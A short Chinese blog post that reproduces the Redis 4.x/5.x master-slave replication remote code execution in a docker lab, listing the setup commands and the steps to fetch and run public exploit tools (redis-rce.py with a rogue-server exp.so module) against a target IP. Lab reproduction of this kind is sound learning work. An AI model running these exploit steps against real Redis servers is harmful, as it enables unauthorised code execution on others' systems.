Redis基于主从复制的RCE 4.x/5.x 复现

0x00 前言

这个Redis漏洞出来很久了,一直没时间复现。
最近在学习docker 就复现了这个漏洞。
docker大法好哇 真的好!
docker大法秒哇 真的秒!

0x01 环境准备

server docker start //启动docker服务
docker search redis5.0 //redis5.0查找镜像
docker pull damonevking/redis5.0 //拉取镜像

0x02 启动redis服务

docker run -p 6379:6379 -d damonevking/redis5.0:latest redis-server

0x03 exp准备

git clone https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本
注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下,
然后执行如下命令:
python3 redis-rce.py -r 192.168.115.43(目标ip) -L 192.168.115.43(源ip) -f exp.so

参考链接:
https://mp.weixin.qq.com/s/3ReNSFoQA1V01_APTMnnyA
https://github.com/Ridter/redis-rce
https://github.com/n0b0dyCN/redis-rogue-server
https://www.cnblogs.com/mrhonest/p/11162735.html

posted @ 2019-11-21 14:50  Sylon  阅读(1172)  评论(1编辑  收藏  举报
Live2D